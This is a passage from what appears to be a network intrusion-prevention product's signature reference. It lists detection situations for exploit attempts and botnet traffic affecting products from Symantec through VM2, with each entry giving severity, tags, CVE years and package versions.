File-Text_Symantec-Products-ActiveX-Control-NavComUI.dll-Possible-Code-Execution

About this situation: Memory corruption exploit against Symantec NavComUI.dll library detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Symantec Norton AntiVirus, Symantec Norton System Works, Symantec Norton Internet Security, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: HTTP-Symantec-Products-ActiveX-Control-NavComUI.dll-Code-Execution
Description:
Back to top

File-Text_TeamViewer-Unquoted-URI-Handler-SMB-Redirect

About this situation: An attempt to exploit a vulnerability in TeamViewer detected.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, TeamViewer, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1427-5242
Last changed: sgpkg-ips-1427-5242
Vulnerability: TeamViewer-Unquoted-URI-Handler-SMB-Redirect
Description:
Back to top

File-Text_Telerik-UI-Insecure-Deserialization-CVE-2019-18935

About this situation: An attempt to exploit a vulnerability in Telerik UI
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Telerik UI, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1261-5242
Last changed: sgpkg-ips-1728-5242
Vulnerability: Telerik-UI-Insecure-Deserialization-CVE-2019-18935
Description:
Back to top

File-Text_TerraMaster-TOS-Remote-Command-Execution-Vulnerability-CVE-2022-24990

About this situation: An attempt to exploit a vulnerability in TerraMaster TOS detected
Context: Text File Stream
Severity: 7
Tags: Unix, Linux, Any Hardware, TerraMaster TOS, CVE2022, Unix not specific, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1592-5242
Last changed: sgpkg-ips-1592-5242
Vulnerability: TerraMaster-TOS-Remote-Command-Execution-Vulnerability-CVE-2022-24990
Description:
Back to top

File-Text_Teslacrypt-Botnet-Traffic

About this situation: Teslacrypt botnet traffic detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Vulnerability: Botnet-Teslacrypt
Description:
Back to top

File-Text_Titan-MFT-Admin-Interface-Path-Traversal-CVE-2023-45689

About this situation: An attempt to exploit a vulnerability in Titan MFT Server detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Titan MFT Server, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1701-5242
Last changed: sgpkg-ips-1701-5242
Vulnerability: Titan-MFT-Admin-Interface-Path-Traversal-CVE-2023-45689
Description:
Back to top

File-Text_Tom-Sawyer-Get-Extension-Factory-Object-Instantiation-MemCorrupt

About this situation: An attempt to exploit a vulnerability in Tom Sawyer GET Extension Factory COM object detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, EMC VMware VI Client, CVE2011, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-610-5211
Vulnerability: Tom-Sawyer-Get-Extension-Factory-Object-Instantiation-MemCorrupt
Description:
Back to top

File-Text_Totolink-setupgradefw-Command-Injection-CVE-2022-26210

About this situation: An attempt to exploit a vulnerability in Totolink wireless routers detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Totolink, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1537-5242
Last changed: sgpkg-ips-1537-5242
Vulnerability: Totolink-setupgradefw-Command-Injection-CVE-2022-26210
Description:
Back to top

File-Text_TP-Link-TL-WR1043N-Cross-Site-Request-Forgery

About this situation: An attempt to exploit a vulnerability in TP-Link WR1043N router firmware detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, TP-Link, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1788-5242
Last changed: sgpkg-ips-1788-5242
Vulnerability: TP-Link-TL-WR1043N-Cross-Site-Request-Forgery
Description:
Back to top

File-Text_Trend-Micro-AntiVirus-Password-Manager-Command-Execution

About this situation: An attempt to exploit a vulnerability in Trend Micro Antivirus Password Manager detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro Antivirus Password Manager, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-725-5211
Last changed: sgpkg-ips-725-5211
Vulnerability: Trend-Micro-AntiVirus-Password-Manager-Command-Execution
Description:
Back to top

File-Text_Trend-Micro-Control-Manager-Cross-Site-Request-Forgery

About this situation: An attempt to exploit a vulnerability in Trend Micro Control Manager detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro Control Manager, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-407-4219
Vulnerability: Trend-Micro-Control-Manager-Cross-Site-Request-Forgery
Description:
Back to top

File-Text_Trend-Micro-Internet-Security-Pro-2010-ActiveX-ExtSetOwner

About this situation: An attempt to exploit a vulnerability in Trend Micro Internet Security Pro detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Trend Micro Internet Security Pro, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: Trend-Micro-Internet-Security-Pro-2010-ActiveX-ExtSetOwner
Description:
Back to top

File-Text_Trend-Micro-Iwsva-Logsettinghandler-Dopostmountdevice-Command-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro InterScan Web Security Virtual Appliance detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro InterScan Web Security Virtual Appliance, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-870-5242
Last changed: sgpkg-ips-870-5242
Vulnerability: Trend-Micro-Iwsva-Logsettinghandler-Dopostmountdevice-Command-Injection
Description:
Back to top

File-Text_Trend-Micro-Mobile-Security-Enterprise-Eas_Agent_Sync_Client_Info-Slink_Id-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro Mobile Security (Enterprise) detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro Mobile Security, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-998-5242
Last changed: sgpkg-ips-998-5242
Vulnerability: Trend-Micro-Mobile-Security-Enterprise-Client_Info-Slink_Id-SQL-Injection
Description:
Back to top

File-Text_Trend-Micro-Mobile-Security-Enterprise-Eas_Agent_Unregister-Slink_Id-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro Mobile Security (Enterprise) detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro Mobile Security, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-993-5242
Last changed: sgpkg-ips-993-5242
Vulnerability: Trend-Micro-Mobile-Security-Enterprise-Eas_Agent-Slink_Id-SQL-Injection
Description:
Back to top

File-Text_Trend-Micro-OfficeScan-Atxconsole-ActiveX-Control-Format-String

About this situation: An attempt to exploit a vulnerability in Trend Micro OfficeScan detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro OfficeScan Corporate Edition, CVE2006, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: HTTP-Trend-Micro-OfficeScan-Atxconsole-ActiveX-Control-Format-String
Description:
Back to top

File-Text_Trend-Micro-OfficeScan-Client-ActiveX-Control-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow vulnerability in Trend Micro OfficeScan Corporate Edition detected
Context: Text File Stream
Severity: 7
Tags: Windows, x86, Trend Micro OfficeScan Corporate Edition, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: HTTP_Trend-Micro-OfficeScan-Client-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_Trend-Micro-OfficeScan-Corporate-Edition-Buffer-Overflow

About this situation: Trend Micro OfficeScan Corporate Edition Stack Based Buffer Overflow
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Trend Micro OfficeScan Corporate Edition, CVE2008, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-648-5211
Last changed: sgpkg-ips-648-5211
Vulnerability: Trend-Micro-OfficeScan-Corporate-Edition-Buffer-Overflow
Description:
Back to top

File-Text_Trend-Micro-OfficeScan-objRemoveCtrl-ActiveX-Control-Buffer-Overflow

About this situation: Detects buffer overflow exploits against the Trend Micro OfficeScan objRemoveCtrl ActiveX control
Context: Text File Stream
Severity: 7
Tags: Windows, x86, Trend Micro OfficeScan Corporate Edition, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: Trend-Micro-OfficeScan-objRemoveCtrl-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_Trend-Micro-Safesync-For-Enterprise-Ad.pm-Id-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in Trend Micro SafeSync for Enterprise detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro SafeSync for Enterprise, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-1728-5242
Vulnerability: Trend-Micro-Safesync-For-Enterprise-Ad.pm-Id-Remote-Command-Execution
Description:
Back to top

File-Text_Trend-Micro-Safesync-For-Enterprise-Check_NFS_Server_Status-Command-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro SafeSync for Enterprise detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro SafeSync for Enterprise, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-945-5242
Last changed: sgpkg-ips-945-5242
Vulnerability: Trend-Micro-Safesync-For-Enterprise-Check_NFS_Server_Status-Command-Injection
Description:
Back to top

File-Text_Trend-Micro-Safesync-For-Enterprise-License-Command-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro SafeSync for Enterprise detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro SafeSync for Enterprise, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-938-5242
Last changed: sgpkg-ips-938-5242
Vulnerability: Trend-Micro-Safesync-For-Enterprise-License-Command-Injection
Description:
Back to top

File-Text_Trend-Micro-Safesync-For-Enterprise-Replace_Local_Disk-Command-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro SafeSync for Enterprise detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro SafeSync for Enterprise, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-949-5242
Last changed: sgpkg-ips-949-5242
Vulnerability: Trend-Micro-Safesync-For-Enterprise-Replace_Local_Disk-Command-Injection
Description:
Back to top

File-Text_TRENDnet-SecurView-Buffer-Overflow

About this situation: An attempt to exploit a TRENDnet SecurView Buffer Overflow vulnerability detected.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, TRENDnet SecurView, CVE2012, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-709-5211
Last changed: sgpkg-ips-709-5211
Vulnerability: TRENDnet-SecurView-Buffer-Overflow
Description:
Back to top

File-Text_Trillian-Aim:-URI-Handler-Buffer-Overflow

About this situation: Buffer overflow exploit against Trillian detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Trillian, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Trillian-Aim:-URI-Handler-Buffer-Overflow
Description:
Back to top

File-Text_Trillian-Aim:-URI-Handler-Code-Injection

About this situation: Attempt to exploit code injection vulnerability in Trillian detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Trillian, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Trillian-Aim:-URI-Handler-Code-Injection
Description:
Back to top

File-Text_Trustwave-Holdings-Modsecurity-Chunked-Transfer-Encoding-Policy-Bypass

About this situation: An attempt to exploit a vulnerability in Trustwave: SpiderLabs ModSecurity detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ModSecurity, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-863-5242
Vulnerability: Trustwave-Holdings-Modsecurity-Chunked-Transfer-Encoding-Policy-Bypass
Description:
Back to top

File-Text_Tumbleweed-SecureTransport-FileTransfer-ActiveX-Control-BOF

About this situation: An attempt to exploit a buffer overflow vulnerability in Tumbleweed SecureTransport detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Tumbleweed SecureTransport, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-573-5211
Vulnerability: Tumbleweed-SecureTransport-FileTransfer-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_Ubisoft-Uplay-Arbitrary-Code-Execution

About this situation: An attempt to exploit a Ubisoft Uplay Arbitrary Code Execution vulnerability detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ubisoft Uplay, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-782-5211
Last changed: sgpkg-ips-841-5242
Vulnerability: Ubisoft-Uplay-Arbitrary-Code-Execution
Description:
Back to top

File-Text_Ultra-Office-Control-ActiveX-Control-Stack-Based-Buffer-Overflow

About this situation: A buffer overflow vulnerability in Ultra Office Control ActiveX control.
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Ultra Office Control, CVE2008, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-665-5211
Last changed: sgpkg-ips-1262-5242
Vulnerability: Ultra-Office-Control-ActiveX-Control-Stack-Based-Buffer-Overflow
Description:
Back to top

File-Text_Unicode-Encoded-Obfuscated-Script-File

About this situation: Suspicious traffic detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1122-5242
Last changed: sgpkg-ips-1349-5242
Description:
Back to top

File-Text_Unitronics-Unidownloader-And-VisiLogic-OPCL-Ipworksssl-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Unitronics VisiLogic OPLC detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Unitronics VisiLogic OPLC, Unitronics UniDownloader, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-715-5211
Last changed: sgpkg-ips-715-5211
Vulnerability: Unitronics-Unidownloader-And-VisiLogic-OPLC-Ipworksssl-Memory-Corruption
Description:
Back to top

File-Text_Unitronics-VisiLogic-ActiveX-Out-Of-Bounds-Array-Indexing

About this situation: An attempt to exploit a vulnerability in Unitronics VisiLogic OPLC detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Unitronics VisiLogic OPLC, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-720-5211
Last changed: sgpkg-ips-720-5211
Vulnerability: Unitronics-VisiLogic-ActiveX-Out-Of-Bounds-Array-Indexing
Description:
Back to top

File-Text_Unitronics-VisiLogic-OPLC-IDE-Teepreviewer-ChartLink-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Unitronics VisiLogic OPLC detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Unitronics VisiLogic OPLC, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-727-5211
Last changed: sgpkg-ips-727-5211
Vulnerability: Unitronics-VisiLogic-OPLC-IDE-Teepreviewer-ChartLink-Memory-Corruption
Description:
Back to top

File-Text_Unitronics-VisiLogic-OPLC-TeeCommander-ChartLink-ActiveX-Control-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Unitronics VisiLogic OPLC detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Unitronics VisiLogic OPLC, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-712-5211
Vulnerability: Unitronics-VisiLogic-OPLC-ActiveX-Control-Memory-Corruption
Description:
Back to top

File-Text_UTF-7-Encoded-HTML

About this situation: HTML encoded as UTF-7
Context: Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections
First detected in: sgpkg-ips-1532-5242
Last changed: sgpkg-ips-1532-5242
Description:
Back to top

File-Text_UTF-8-Title-In-HTML

About this situation: A HTML file with a UTF-8 title detected
Context: Text File Stream
Severity: 2
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2018-04, CVE2018, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-1057-5242
Last changed: sgpkg-ips-1057-5242
Vulnerability: Internet-Explorer-Memory-Corruption-CVE-2018-0870
Description:
Back to top

File-Text_Vandyke-Securecrt-Configuration-Folder-Vulnerability

About this situation: An attempt to exploit a vulnerability in VanDyke Software SecureCRT detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VanDyke SecureCRT, CVE2004, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Vandyke-Securecrt-Configuration-Folder-Vulnerability
Description:
Back to top

File-Text_Vawtrak-Botnet-Traffic

About this situation: Vawtrak botnet traffic detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-650-5211
Last changed: sgpkg-ips-650-5211
Vulnerability: Vawtrak-Botnet
Description:
Back to top

File-Text_VBScript-Array-Chr-Obfuscation

About this situation: Obfuscated VBScript detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-843-5242
Last changed: sgpkg-ips-1282-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_VBScript-Directory-Traversal

About this situation: A potentially malicious script
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1059-5242
Description:
Back to top

File-Text_VBScript-Execute-Chr-Obfuscation

About this situation: Obfuscated VBScript detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-835-5242
Last changed: sgpkg-ips-1162-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_VBScript-In-Bo-Bbs

About this situation: VBScript tags in Bo-Bbs layout detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-892-5242
Last changed: sgpkg-ips-1261-5242
Vulnerability: VBScript-In-Insecure-Frameworks
Description:
Back to top

File-Text_VBScript-In-Wordpress

About this situation: VBScript tags in Wordpress layout detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-892-5242
Last changed: sgpkg-ips-926-5242
Vulnerability: VBScript-In-Insecure-Frameworks
Description:
Back to top

File-Text_VBScript-Scripting-Detected

About this situation: VBScript scripting used
Context: Text File Stream
Severity: 2
Tags: Windows, Any Hardware, Internet Explorer, Windows not specific, Internet Explorer not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-470-5211
Last changed: sgpkg-ips-722-5211
Vulnerability: VBScript-Scripting-Detected
Description:
Back to top

File-Text_VBScript_Engine_Use_After_Free_Vulnerability_CVE-2019-1485

About this situation: An attempt to exploit a vulnerability in VBScript Engine detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2019-12, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1209-5242
Last changed: sgpkg-ips-1209-5242
Vulnerability: VBScript_Engine_Use_After_Free_Vulnerability_CVE-2019-1485
Description:
Back to top

File-Text_vBSEO-Remote-PHP-Code-Injection

About this situation: An attempt to exploit a vBSEO Remote PHP Code Injection vulnerability detected.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, vBSEO, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-712-5211
Vulnerability: vBSEO-Remote-PHP-Code-Injection
Description:
Back to top

File-Text_Verisign-MPKI-ConfigChk-ActiveX-Control-Buffer-Overflow

About this situation: Detected an access to vulnerabile methods of Verisign MKI ConfigChk ActiveX control
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Verisign MPKI, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: Verisign-MPKI-ConfigChk-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_VeryPDF-PDFView-Heap-Overflow

About this situation: An attempt to exploit a VeryPDF PDFView Heap Overflow vulnerability detected
Context: Text File Stream
Severity: 7
Tags: Windows XP, Any Hardware, VeryPDF PDFView, CVE2008, Windows XP not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-800-5242
Vulnerability: VeryPDF-PDFView-Heap-Overflow
Description:
Back to top

File-Text_Viber-URI-Handler-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Viber detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Viber, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1177-5242
Last changed: sgpkg-ips-1177-5242
Vulnerability: Viber-URI-Handler-Remote-Code-Execution
Description:
Back to top

File-Text_VideoLAN-VLC-ActiveX-Control-Crafted-Parameter-Memory-Corruption

About this situation: Detected an access to vulnerable methods of VideoLAN VLC ActiveX control
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, VideoLAN VLC, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: VideoLAN-VLC-ActiveX-Control-Crafted-Parameter-Memory-Corruption
Description:
Back to top

File-Text_VideoLAN-VLC-AMV-Code-Execution

About this situation: An attempt to exploit a VideoLAN VLC AMV Code Execution vulnerability detected.
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, VideoLAN VLC, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-745-5211
Last changed: sgpkg-ips-745-5211
Vulnerability: VideoLAN-VLC-AMV-Code-Execution
Description:
Back to top

File-Text_Vim-Modelines-Remote-Command-Execution

About this situation: An attempt to exploit a Vim Modelines Remote Command Execution vulnerability detected
Context: Text File Stream
Severity: 7
Tags: Linux, Any Hardware, Vim, CVE2016, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-836-5242
Last changed: sgpkg-ips-836-5242
Vulnerability: Vim-Modelines-Remote-Command-Execution
Description:
Back to top

File-Text_Vim-Retab-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in the Vim retab command detected.
Context: Text File Stream
Severity: 7
Tags: Unix, Linux, Any Hardware, Vim, CVE2022, Unix not specific, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1455-5242
Last changed: sgpkg-ips-1483-5242
Vulnerability: Vim-Retab-Integer-Overflow
Description:
Back to top

File-Text_ViperSoftX-Script-Content

About this situation: ViperSoftX script content
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1844-5242
Last changed: sgpkg-ips-1844-5242
Vulnerability: ViperSoftX-C2-Traffic
Description:
Back to top

File-Text_Virut-Malware-C2-Traffic

About this situation: Virut malware C2 traffic was detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1093-5242
Last changed: sgpkg-ips-1096-5242
Vulnerability: Virut-Malware-C2-Traffic
Description:
Back to top

File-Text_Viscom-Image-Viewer-ActiveX-Tifmergemultifiles-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Viscom Software Image Viewer CP Gold ActiveX Control detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Viscom Image Viewer, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-427-4219
Last changed: sgpkg-ips-637-5211
Vulnerability: Viscom-Software-Image-Viewer-ActiveX-Tifmergemultifiles-Buffer-Overflow
Description:
Back to top

File-Text_Visual-Basic-Script-ShellCode-Generation

About this situation: Suspicious JavaScript code detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: Visual-Basic-Script-ShellCode-Generation
Description:
Back to top

File-Text_VLC-Media-Player-ABC-File-Instruction-Field-Parsing-Heap-Overflow

About this situation: An attempt to exploit a vulnerability in libmodplug project libmodplug detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VideoLAN VLC, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-539-5211
Last changed: sgpkg-ips-720-5211
Vulnerability: VLC-Media-Player-ABC-File-Instruction-Field-Parsing-Heap-Overflow
Description:
Back to top

File-Text_VLC-Media-Player-ABC-File-Parts-Field-Parsing-Heap-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in libmodplug project libmodplug detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VideoLAN VLC, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-537-5211
Last changed: sgpkg-ips-537-5211
Vulnerability: VLC-Media-Player-ABC-File-Parts-Field-Parsing-Heap-Integer-Overflow
Description:
Back to top

File-Text_VLC-Media-Player-ParseJSS-Heap-Buffer-Overflow

About this situation: A VLC Media Player ParseJSS Heap Buffer Overflow vulnerability
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VideoLAN VLC, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-935-5242
Last changed: sgpkg-ips-1400-5242
Vulnerability: VLC-Media-Player-ParseJSS-Heap-Buffer-Overflow
Description:
Back to top

File-Text_VM2-Sandbox-Protection-Bypass-CVE-2022-36067

About this situation: An attempt to exploit a vulnerability in VM2 detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VM2, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1582-5242
Last changed: sgpkg-ips-1582-5242
Vulnerability: VM2-Sandbox-Protection-Bypass-CVE-2022-36067
Description:
Back to top

File-Text_VM2-Sandbox-Protection-Bypass-CVE-2023-29017

About this situation: An attempt to exploit a vulnerability in VM2 detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VM2, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1582-5242
Last changed: sgpkg-ips-1582-5242
Vulnerability: VM2-Sandbox-Protection-Bypass-CVE-2023-29017
Description:
Back to top

File-Text_VM2-Sandbox-Protection-Bypass-CVE-2023-30547

About this situation: An attempt to exploit a vulnerability in VM2 detected
Context: Text File Stream
Severity: 7
